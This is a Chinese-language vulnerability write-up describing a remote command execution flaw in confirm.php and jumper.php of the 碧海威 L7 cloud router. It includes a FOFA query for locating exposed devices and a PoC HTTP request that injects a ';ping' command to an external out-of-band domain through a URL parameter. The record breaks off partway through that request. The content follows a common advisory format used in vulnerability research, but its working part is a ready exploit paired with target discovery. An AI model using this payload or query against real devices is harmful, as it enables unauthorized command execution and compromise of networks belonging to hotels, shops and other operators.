0x01 产品简介
碧海威L7网络设备是 北京智慧云巅科技有限公司下的产品,基于国产化ARM硬件平台,采用软硬一体协同设计方案,释放出产品最大效能,具有高性能,高扩展,产品性能强劲,具备万兆吞吐能力,支持上万用户同时在线等高性能。其采用简单清晰的可视化WEB管理界面,支持最新HTML5,方便移动设备访问管理,分级别多层次管理模块,使用简单,维护方便;设备状况、网络流量一目了然,一键备份/恢复,让网络管理更简单。是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备,具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。
0x02 漏洞概述
碧海威L7 confirm.php、jumper.php接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。
0x03 影响范围
碧海威科技-L7
0x04 复现环境
FOFA:app="碧海威科技-L7云路由"
0x05 漏洞复现
PoC-1
GET /notice/confirm.php?t=;ping%20fwvjytharz.dgrh3.cn HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT